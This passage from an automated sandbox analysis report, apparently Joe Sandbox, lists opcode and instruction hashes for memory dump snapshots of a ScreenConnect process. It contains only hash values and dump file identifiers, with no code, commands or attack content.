                                                                                                                                                                                • Opcode ID: 90197ac40bd5d70b710f629d2133a1da1cf5afd349abbc37a21c6ad95306661f
                                                                                                                                                                                • Instruction ID: e1d1fded2fbc8e45590ca86a590e4d83d1454699f1740fa28e011cd6d049a986
                                                                                                                                                                                • Opcode Fuzzy Hash: 90197ac40bd5d70b710f629d2133a1da1cf5afd349abbc37a21c6ad95306661f
                                                                                                                                                                                • Instruction Fuzzy Hash: 8731EA70600B058FCB34DF69E84466ABBF5EF89320F104A6CD0969B6E5D770E94ACF81
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8d5dd69c4c6c1f5e899ab5469073629e85436ae55f246068d1b5b77a679ee0e4
                                                                                                                                                                                • Instruction ID: 5540438341a935738192895603f74c5da978e88b582e6eb97fcb701e885a5e85
                                                                                                                                                                                • Opcode Fuzzy Hash: 8d5dd69c4c6c1f5e899ab5469073629e85436ae55f246068d1b5b77a679ee0e4
                                                                                                                                                                                • Instruction Fuzzy Hash: B9218D303453449FCB09DFBCE9919AA7FE5EF8224030584EAD149CB2A6EB759D09CB61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8904fdc5524fc32c3a4e38f0f2bc502ad6eccf9732121feefbba550712f4fc3a
                                                                                                                                                                                • Instruction ID: 2c33af615ea9dcb3240afe3bd101a88fb9e8c0c93ccf2d55d2dfc2b4fe688cac
                                                                                                                                                                                • Opcode Fuzzy Hash: 8904fdc5524fc32c3a4e38f0f2bc502ad6eccf9732121feefbba550712f4fc3a
                                                                                                                                                                                • Instruction Fuzzy Hash: 66313C70A007058FC734CF29D888A6BB7F5EF89724B144A2CD496DB7A5D731E906CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ca277cbc7dad98c2128d0bb34147f443bdfd2f51cbd3fa15e7098d792cb9a43c
                                                                                                                                                                                • Instruction ID: 0893d4a7877165bccfa6e51dcc639c57489b2c28f69d84a7ac2544abaec4766b
                                                                                                                                                                                • Opcode Fuzzy Hash: ca277cbc7dad98c2128d0bb34147f443bdfd2f51cbd3fa15e7098d792cb9a43c
                                                                                                                                                                                • Instruction Fuzzy Hash: E5310A306007118FCB38DF6AD84466ABBF1EF99310B108A6DD596DB7A1D730E946CF91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6a654aa228a86953bed851b6a156a1152450c864e670e0256162dbefd5f6fb5f
                                                                                                                                                                                • Instruction ID: 8d894ed40ad3e190fd78234a8c1ce9dc74b9f4bba986d1085ab08ef1f44af998
                                                                                                                                                                                • Opcode Fuzzy Hash: 6a654aa228a86953bed851b6a156a1152450c864e670e0256162dbefd5f6fb5f
                                                                                                                                                                                • Instruction Fuzzy Hash: A331F5B6A14562CFCF18DF78D99CAADBBB0FF44318B184269C5269B254D731A901CF42
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a6e3d333c27ab229151958615abaee452a927a3d6f822dcc16d57d3498594c30
                                                                                                                                                                                • Instruction ID: 1647a7a24e00307d798382ed70c041c8613397ff5eff5970217eb13089dee036
                                                                                                                                                                                • Opcode Fuzzy Hash: a6e3d333c27ab229151958615abaee452a927a3d6f822dcc16d57d3498594c30
                                                                                                                                                                                • Instruction Fuzzy Hash: 4D317C30B00208DFDB15DF99C954AAEBBF5AF8E301F25409AD406AB361CB319D02CF60
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 99779bd663ab2d71eb539c17cf41c421682fe34a4f28cd994d0bb9d717213a06
                                                                                                                                                                                • Instruction ID: 9ae4d30b876778820aaf9fe35cc0ad4ded7eb66dd5d2f4493cc90d072366e47f
                                                                                                                                                                                • Opcode Fuzzy Hash: 99779bd663ab2d71eb539c17cf41c421682fe34a4f28cd994d0bb9d717213a06
                                                                                                                                                                                • Instruction Fuzzy Hash: 1C314D30A01244DFEB15CFA9C995BAEBBF6AF8E705F254099D406AB361CB319D42CF50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c13eb01bbabdc63b6eee906193985595e30a95faecaa65cfc9f767448d6766d9
                                                                                                                                                                                • Instruction ID: 8ac62ac7a095d84393948d98515b6905fa03b17e341fb9b3e2e7ffe2ed7b2b47
                                                                                                                                                                                • Opcode Fuzzy Hash: c13eb01bbabdc63b6eee906193985595e30a95faecaa65cfc9f767448d6766d9
                                                                                                                                                                                • Instruction Fuzzy Hash: 63216D31B011058FDB18DB68C956BEEBBF1DF89305F158069D506EB350DB729D01CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 949228ceb3e64621c04eaf6597f080bda39646784b6dfcc487dcc38aa7825ef8
                                                                                                                                                                                • Instruction ID: 654d71203c6f7c64c04ba8e55d0d21c0a131d41ca01447cb6c3c6a40a3fcfe56
                                                                                                                                                                                • Opcode Fuzzy Hash: 949228ceb3e64621c04eaf6597f080bda39646784b6dfcc487dcc38aa7825ef8
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F1129313402004BDB18EABDF984AAA77D9DBC02657144476E60CCF394EFB1DC45C790
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 094650e307f9f175974566adcec8e205fe9522d84d8eaed7847731485b384ba5
                                                                                                                                                                                • Instruction ID: 58700eb40cad5118284725d88fba4481ea7ccdaf00e504b72996ebe04fa041d0
                                                                                                                                                                                • Opcode Fuzzy Hash: 094650e307f9f175974566adcec8e205fe9522d84d8eaed7847731485b384ba5
                                                                                                                                                                                • Instruction Fuzzy Hash: A721F221B052489FDB15DBBCD955929BFE9EFCA24070845EBD049CB366DA349C05C3D1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3888522738.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_bfd000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6e1247dbf27f5dda81b59da1011a05d128174838a2bb6c1f283c94c3cb594e37
                                                                                                                                                                                • Instruction ID: 9243c38cd16c953e3c06992df64c7c653c81d51b99531cd27436de74e8a2e7f8
                                                                                                                                                                                • Opcode Fuzzy Hash: 6e1247dbf27f5dda81b59da1011a05d128174838a2bb6c1f283c94c3cb594e37
                                                                                                                                                                                • Instruction Fuzzy Hash: C0212875500208EFCB05DF14D9C4F36BFA6FB98314F2085A9DA094F256C336D81ADBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ccd8f23e005c832a278a579fdb9411147452687153bc4c6a732bf0bf7fcbba8a
                                                                                                                                                                                • Instruction ID: 2cf816ed6a1dc0992577cda92214bf71612274e122577742ede0bba32a87086d
                                                                                                                                                                                • Opcode Fuzzy Hash: ccd8f23e005c832a278a579fdb9411147452687153bc4c6a732bf0bf7fcbba8a
                                                                                                                                                                                • Instruction Fuzzy Hash: 0521D8302143456FC709EB34E895E597BAAFF81344F44852AE5048F29ADFB5E80DC7D4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ec68f0518f84e2ff2c53f75cea8cc24808b775e7f25ddceaf31a8d4b7d2e08bd
                                                                                                                                                                                • Instruction ID: c5e30249cb76082daa909a1fdaa9388c240737c3d7749ca961ffc23ea9376857
                                                                                                                                                                                • Opcode Fuzzy Hash: ec68f0518f84e2ff2c53f75cea8cc24808b775e7f25ddceaf31a8d4b7d2e08bd
                                                                                                                                                                                • Instruction Fuzzy Hash: F021F670D043498FCF05EFA4D99485E7FB5FF85300B0049AAD5409B365CB30A905CF62
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4f4eccfc2b46fde1fbe9b95a5f279c50c5435d277875b09fe767097a6a5fa846
                                                                                                                                                                                • Instruction ID: 9776fc4bf06295c135d6d5ea80c0f08744f3be380e886041397102dda5728ead
                                                                                                                                                                                • Opcode Fuzzy Hash: 4f4eccfc2b46fde1fbe9b95a5f279c50c5435d277875b09fe767097a6a5fa846
                                                                                                                                                                                • Instruction Fuzzy Hash: 32218E31A002095FC705EB68D991FAE77E6EFC5710B04856AE5059B396DF30AD0ACBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 25a188fbdce0f7d2aa3a1ba261f59016a7accc7bb3b200a7929893ddd19f1c3b
                                                                                                                                                                                • Instruction ID: 0d56b684c423940e22071f01984df9c6ea88c3bcd251c2871fb457ae65ccf8cd
                                                                                                                                                                                • Opcode Fuzzy Hash: 25a188fbdce0f7d2aa3a1ba261f59016a7accc7bb3b200a7929893ddd19f1c3b
                                                                                                                                                                                • Instruction Fuzzy Hash: 8B218031B002099FCB05DFA8ED829BEBBF5EF85310B048566E519EB355DB31AD05CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a90f50b1ecb9f608fbfa1aa5faa8bffc52d35505520abdb349538051ad04fdde
                                                                                                                                                                                • Instruction ID: dab29c959b2d5bf9f0b33972f71f663b261b1c8bf88c6c56317cbe40531a6a21
                                                                                                                                                                                • Opcode Fuzzy Hash: a90f50b1ecb9f608fbfa1aa5faa8bffc52d35505520abdb349538051ad04fdde
                                                                                                                                                                                • Instruction Fuzzy Hash: 46215C35A402198FDF18DBACD965AEDBBF6BF89310F05446AD106AB370CB74AC41CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 251ff5419a5ceb8a403a1a5506a140de151dda5510ce2b87433167676b8e6bc8
                                                                                                                                                                                • Instruction ID: a10f52d34df9c2c96d69c90d84e2db22b511f6158d65e0ceeb615d9f56d82086
                                                                                                                                                                                • Opcode Fuzzy Hash: 251ff5419a5ceb8a403a1a5506a140de151dda5510ce2b87433167676b8e6bc8
                                                                                                                                                                                • Instruction Fuzzy Hash: 33214F31D14B0A9ECB01EFB8C8505EAFBB0EF9A310F01C76AD598A7111FB70A695C791
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f1a2f0fb65b0cd27588bcbdf388ba3c24aefec35fba5be92e3fc678216543d2e
                                                                                                                                                                                • Instruction ID: 9288cf419f118a56c10dc3ccbdd9d569c5f4fbf5f563c1de28ff11442122da9a
                                                                                                                                                                                • Opcode Fuzzy Hash: f1a2f0fb65b0cd27588bcbdf388ba3c24aefec35fba5be92e3fc678216543d2e
                                                                                                                                                                                • Instruction Fuzzy Hash: B72134B680024ADFCB10CF9AC844ADEBBF1FF88310F14C519E919A7250C339A656DFA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d4686398fb54006e9400e671d81fa4bb4f2607cd6c58798047607dd721e67fed
                                                                                                                                                                                • Instruction ID: b4c61894cad48688a968e6eb28fd6f9a44494bf875ab1240472502e81ca736a9
                                                                                                                                                                                • Opcode Fuzzy Hash: d4686398fb54006e9400e671d81fa4bb4f2607cd6c58798047607dd721e67fed
                                                                                                                                                                                • Instruction Fuzzy Hash: E6215E30200A058FD738CF69D844A9ABBF5EF84320B118A2DD497976A1DB31E95ACF90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1899e40577fcf68ca8bed1cd29d963dfcbe077708f3dd7229526b507ea9fad96
                                                                                                                                                                                • Instruction ID: a3e8fd070814fb9b858efde74a2de94faa986d4760aae2ac1fe441374a538cc1
                                                                                                                                                                                • Opcode Fuzzy Hash: 1899e40577fcf68ca8bed1cd29d963dfcbe077708f3dd7229526b507ea9fad96
                                                                                                                                                                                • Instruction Fuzzy Hash: DD11E5316093849FC709CF2DD890DA5BFA1EF8621070A809AE5858F262CB36ED42CB61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0323262687ef33042ebc7b3afb9c1b042ee8b299aa5302e7798f42978af9a717
                                                                                                                                                                                • Instruction ID: bc9feb9e95ec1915a82a0c620671182556e82b7f119f84e23f3a9edca8250d9a
                                                                                                                                                                                • Opcode Fuzzy Hash: 0323262687ef33042ebc7b3afb9c1b042ee8b299aa5302e7798f42978af9a717
                                                                                                                                                                                • Instruction Fuzzy Hash: 2F213030A007018FD728DF29E845A6EBBF5FF48711B20CA2CD9A6876A5D774E901CF81
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0b6ad74438425659c7faeaa034e3874550b5e4e9185a5d862a6765243ef9f128
                                                                                                                                                                                • Instruction ID: 0086e336cae8cbfa9faa675ed586f9d63d10fe24c5fb00bba031bba1f2b0991f
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b6ad74438425659c7faeaa034e3874550b5e4e9185a5d862a6765243ef9f128
                                                                                                                                                                                • Instruction Fuzzy Hash: 10119031B002095BCB04EB68E941F6EB7E6EFC4750F04852AE505AB399DF70AE0987E1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 46352770613135c03ffccae52da549668333dc52fb242b533bc97555a1dcb40a
                                                                                                                                                                                • Instruction ID: fcd530ac860abf2687493a15eaf8f45359d98236b3a385c15f6e3ce59d0274d8
                                                                                                                                                                                • Opcode Fuzzy Hash: 46352770613135c03ffccae52da549668333dc52fb242b533bc97555a1dcb40a
                                                                                                                                                                                • Instruction Fuzzy Hash: 832137B6C0024A9FCB14CF9AC844ADEBBF5FF48310F148419E919A7210C339A656CFA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3c8df8616600944352567b182854540f3455908db6c09b114227d35a13ff0a17
                                                                                                                                                                                • Instruction ID: 5d1998904a8965296cbf588bd4f56f3711f94e98d9bb128def48b7b9e9970a1d
                                                                                                                                                                                • Opcode Fuzzy Hash: 3c8df8616600944352567b182854540f3455908db6c09b114227d35a13ff0a17
                                                                                                                                                                                • Instruction Fuzzy Hash: 76114231B003099FCB04EFA8E9819AEBBF9FF89350B108565E519AB355DB30ED05CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2d5a718eb9f1d69e7b9bc1010e68fdfde255712304e919b614cc9d2a42a7e0cf
                                                                                                                                                                                • Instruction ID: e52d0fc051c56a7356cfca939e554ddbd0ade3754c24fd5881375ed9e4c480e6
                                                                                                                                                                                • Opcode Fuzzy Hash: 2d5a718eb9f1d69e7b9bc1010e68fdfde255712304e919b614cc9d2a42a7e0cf
                                                                                                                                                                                • Instruction Fuzzy Hash: D711A371E40219AFDB29CE6CC840AEEB7B6EFC5300F0885B6D914DB294D7729906CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 528ae7afadb377b95a74d63d76ef74a67643bdb173dc6e27f89546bbb0361716
                                                                                                                                                                                • Instruction ID: d10785e6fe443a12660f6408557bcbb0569503b5de110e4eec070afa5b89a230
                                                                                                                                                                                • Opcode Fuzzy Hash: 528ae7afadb377b95a74d63d76ef74a67643bdb173dc6e27f89546bbb0361716
                                                                                                                                                                                • Instruction Fuzzy Hash: AB01A9763001008FC708DB7DE894A6EB7E6EBC8224319847BE609C7365CA72AC17CB65
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a48fe5caac5d2f6302797334901ba9b5133213a080138f7d726e4f677ab188c1
                                                                                                                                                                                • Instruction ID: a6f585fc21aa3c76e777ce3aa71d5c2553ebae99c88d8de9dbd182ea55530eb7
                                                                                                                                                                                • Opcode Fuzzy Hash: a48fe5caac5d2f6302797334901ba9b5133213a080138f7d726e4f677ab188c1
                                                                                                                                                                                • Instruction Fuzzy Hash: 3311C431600205CFEF31CF29EC45AAE7BBAEF81714B24856AD055CB262D770E90ACB80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3888522738.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_bfd000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                • Instruction ID: 325f9378bad6104d338567c5f2d148316c5a856b7be965d1b916140819ea4822
                                                                                                                                                                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                • Instruction Fuzzy Hash: EF11E176504284CFCB02DF10D5C4B26BFB2FB94314F24C5A9D9090F256C336D85ACBA2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 005ca4cc9cbd0a974dd432ab2f222103abdd9260abcc2c1aad084c713b9ad4c3
                                                                                                                                                                                • Instruction ID: 6f30a038463dbeff54a74a8662cfc741fc9d3563e048a614e7fce612ae8571cb
                                                                                                                                                                                • Opcode Fuzzy Hash: 005ca4cc9cbd0a974dd432ab2f222103abdd9260abcc2c1aad084c713b9ad4c3
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F113035A4021A9FCB01DFA8C9809DEBBF1EF49314B14846AD904FF261D731AA0ACB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 75e6867c0317952237ddfc19f0f3bd3c058f690b385b59ab627ff3417952ef77
                                                                                                                                                                                • Instruction ID: 4d253069134c715431e9b3439474e7a388e22f70640d04eb3433836070638299
                                                                                                                                                                                • Opcode Fuzzy Hash: 75e6867c0317952237ddfc19f0f3bd3c058f690b385b59ab627ff3417952ef77
                                                                                                                                                                                • Instruction Fuzzy Hash: B12133B18042099FCB10CF9AC444AEEFBF4EB48320F10842AD918A7240D778A545CFA5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
